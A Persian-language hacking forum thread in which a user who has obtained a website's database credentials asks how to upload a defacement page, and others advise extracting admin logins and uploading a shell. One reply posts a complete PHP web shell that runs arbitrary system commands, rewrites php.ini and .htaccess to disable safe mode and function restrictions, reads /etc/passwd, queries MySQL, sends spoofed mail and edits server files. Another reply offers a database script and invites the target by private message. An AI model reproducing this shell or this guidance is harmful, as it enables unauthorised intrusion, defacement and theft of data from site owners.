رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام دوتا سوال داشتم

 

رمز و یوزر نیم دیتابیس یه سایت رو بدست آوردم الان برای اینکه بخوام صفحه دیفیس خودم رو آپلود کنم چیکار میتونم بکنم ؟؟؟؟

 

و راستی رمزی که از اونجا بدست اومده با رمز سی پنل سایت فرق داره ؟؟؟؟

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

میتونی ب دیتابیس وصل شی و اطلاعاتو ببینی

ممکنه تو دیتابیس رمز و یوزر پنل ادمین باشه ک میتونی وارد پنل بشی و شل اپ کنی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

میتونی ب دیتابیس وصل شی و اطلاعاتو ببینی

ممکنه تو دیتابیس رمز و یوزر پنل ادمین باشه ک میتونی وارد پنل بشی و شل اپ کنی

سلام خوب بود اگه میگفتین چطور باید به دیتابیس وصل بشم البته میدونم میشه از اسکریپت استفاده کرد میخوام بدونم توی کالی راهی داره یا ابزاری ؟؟؟

گفتین ممکنه تو دیتابیس رمز و یوزر باشه اگر نبود راهی داره تا بتونم وارد پنل بشم؟؟؟؟

<!DOCTYPE html>
<html>
<head>
<link rel="Shortcut Icon" href="http://forum.irsecteam.org/favicon.ico'>http://forum.irsecteam.org/favicon.ico" type="image/x-icon" />
<style>
textarea{
    overflow:auto;
    border:solid 2px #000000;
       color:#000;
       background-color:#eee;
}
#DD{
      width:1000px;
      height:1000px;
      margin:auto auto;
      padding:20px;
}
h2 {
    text-shadow: 5px 5px 5px #FF0000;
}
h3 {
    text-shadow: 5px 5px 5px #006600;
}
.text-box{
    width:300px;
}
body {
     background : #000000;
     }
</style>
</head>
<body>
<center>
<h2><font color=red>IST Black Hero (Public)</font></h2><br>
<img src="http://forum.irsecteam.org/favicon.ico'>http://forum.irsecteam.org/favicon.ico"><br>
<h3><font color=green>By Hero</font></h3><hr>
<?php 
if(isset($_POST['submit'])) {
system($_POST['cmd'],$a); 
echo $a; }                                                                                                                                                                                                        
?>
<form method="post" action=""> 
<font color=green>Cmd</font><input type="text" name="cmd" class="text-box"><br><br><input type="submit" name="submit" style="background-color:green" class="text-box" value="RUN"></form><hr>
<form method="post" action=""> <input class="text-box" type="submit" name="submit" value="Safe Mode" style="background-color:green"></form>

<?php
if(isset($_POST['submit'])) { 
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] evil files created succes ! \n";
}
else{
echo "[-] access denial ! \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed \n";
}
else{
echo "[-] 404 php.ini not found !\n";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "[+] evil .htaccess writing...done\n";
}
else{
echo "[-] evil .htaccess Not found!\n";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
 }
 ?>
 <hr>
  <?php 
if(!isset($_POST['submit'])) { main(); } 
 function main() { 
 echo '<form method="post" action=""> 
<font color=green>Host :         </font><input type="text" name="sv" value="localhost" class="text-box"></input></br><br>
<font color=green>User :      </font><input type="text" name="user" class="text-box"></input></br></br>
<font color=green>Passw:  </font><input type="text" name="pass" class="text-box"></input></br></br>
<font color=green>-DB--:</font><input type="text" name="db" class="text-box"></input></br></br></br>
<font color=green>Query:</font><textarea rows="3" cols="40" name="query" class="text-box"></textarea></br></br>
<center><input type="submit" name="submit" value="Connect" style="background-color:green" class="text-box"></input></center> <hr>
</form>'; }  
if(isset($_POST['submit'])) { 
main(); 
$Myq=mysql_connect($_POST['sv'],$_POST['user'],$_POST['pass']); 
if(!$Myq) { die("cant connect to mysql"); } 
elseif($Myq) { 
mysql_select_db($_POST['db']); 
$sql=mysql_query($_POST['query']);
$records = mysql_num_rows($sql);
echo "$records Rows Found In Database";
echo "<table>";
while ($row = mysql_fetch_row($sql)){
  echo "<tr>";
  foreach ($row as $field){
    echo "<td>".$field."</td>";
  }
  echo "</tr>";
}
echo "</table>";
mysql_close($Myq);

} 
 }
?><br><hr>
 <?php
// display form if user has not clicked submit
if (!isset($_POST["submit"])) {
  ?>
  <form method="post" action="<?php echo $_SERVER["PHP_SELF"];?>">
<font color=green>  To : </font><input type="text" name="to" class="text-box"><br><br>
<font color=green>  From: </font><input type="text" name="from" class="text-box"><br><br>
<font color=green>  Subject: </font><input type="text" name="subject" class="text-box"><br><br>
<font color=green>  Message: </font><textarea rows="10" cols="40" name="message" class="text-box"></textarea><br><br>
  <input type="submit" name="submit" value="SEND" class="text-box" style="background-color:green"><br>
  </form>
  <?php
} else {    
  if (isset($_POST["from"])) {
    $to=$_POST['to'];
    $from = $_POST["from"]; // sender
    $subject = $_POST["subject"];
    $message = $_POST["message"];
    // message lines should not exceed 70 characters (PHP rule), so wrap it
    $message = wordwrap($message, 70);
    // send mail
    mail($to,$subject,$message,"From: $from\n");
    echo "Sent";
  }
}
?><br><hr>
<div id="DD">
<?php 
if(isset($_GET['dir']) and !is_dir($_GET['dir'])) { 
exit("Invalid Directory");
}
if(isset($_GET['dir'])) { 
$dir=$_GET['dir']; } 
else { 
$dir=getcwd(); }
$files1 = scandir($dir);
echo "<strong>File Name    |     File Size     |      File Premission</strong></br> ";
foreach($files1 as $file) { 
$filesize=filesize($dir."/".$file);  
$fsize=$filesize/1024; 

$perms = fileperms($dir."/".$file);
if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-')); 
            if(isset($info)) {
            if(is_dir($dir."/".$file)) { 
 echo "<a href='?dir=$dir/$file'>$file</a></br>" ; }
 else {
echo "<a href='?file=$dir/$file'>$file</a><font color=#7777777> |    $fsize Killo Bytes</font>      |   $info </br>";  }
}
 }
 if(isset($_GET) and isset($_GET['file']) and file_exists($_GET['file']) and !is_dir($dir."/".$file)) { 
$files = file_get_contents($_GET["file"], true); 
ob_start();
?>

<form method='post' action='>
<center><textarea name='context' rows=20 cols=40 ><?php echo "$files"; ?></textarea><input type='submit' name='submit' value='edit' /></center></form>
<?php
if(isset($_POST['submit'])) {  
$a=fopen($_GET['file'],"w+");
fwrite($a,$_POST['context']); 
}

 } 
elseif(isset($_GET) and isset($_GET['file']) and !file_exists($_GET['file'])) { 
 exit("invalid File"); }  
?>
</div><br><hr><center>
<p><font color=red><b><a href="http://forum.irsecteam.org/">Copyright 2014.For Iran Security Team Public Version</a></b></font></p>


</center>
</body>
</html>
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

دوستان من میخوام آپلود شل کنم تا دسترسی پیدا کنم و دیفیس خودمو آپلود کنم ولی سایتش جایی برای آپلود فایل نداره راستی دیتابیس سایت mysql هست و میدونید که localhost  نمیتونم وارد پنلش بشم .fingersmiley.gif:)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام.

یک اینکه باید از اسکریپت Mysql برای وصل شدن به دیتابیس استفاده کنید که پیوست میکنم.

دوم برای آپلود شل تارگت رو پ.خ کنید تا بررسی بشه.

موفق باشید

Mysql.rar

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...